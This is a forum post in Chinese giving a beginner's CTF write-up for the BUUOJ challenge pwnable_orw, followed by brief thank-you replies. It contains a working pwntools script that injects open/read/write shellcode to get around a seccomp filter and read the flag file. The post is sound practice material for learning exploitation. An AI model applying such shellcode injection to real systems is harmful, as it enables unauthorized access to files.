CTF-Pwn入门刷题WP
主要在BUUOJ上面刷Pwn题,今年的目标是刷完所有的一分题;每周会写两三道题目的WP;
## pwnable_orw
checksec发现是32位
使用IDA打开看一下,主要功能是直接输入shellcode,然后执行
这个题目前面有一个`orw_seccomp`函数,这个函数内部调用了seccomp
这是一个之前没听过的概念,会进入linux的一个高安全模式,这种模式下不能执行execve这样的系统调用;
只能执行read、write、open这些
所以这边写脚本需要用shellcraft自己写shellcode,不能直接用sh这样
```python
from pwn import *
io = process('./orw')
elf = ELF('./orw')
payload = asm(shellcraft.open('flag'))
payload += asm(shellcraft.read(3,'esp',100))
payload += asm(shellcraft.write(1,'esp',100))
io.sendline(payload)
io.interactive()
``` 谢谢分享好东西啊 感谢大神分享 谢谢分享好东西啊 感谢楼主分享 {:301_998:} 感谢分享 感谢分享 感谢大神分享 请问PWN入门看啥好? 6666真不错
页:
[1]
2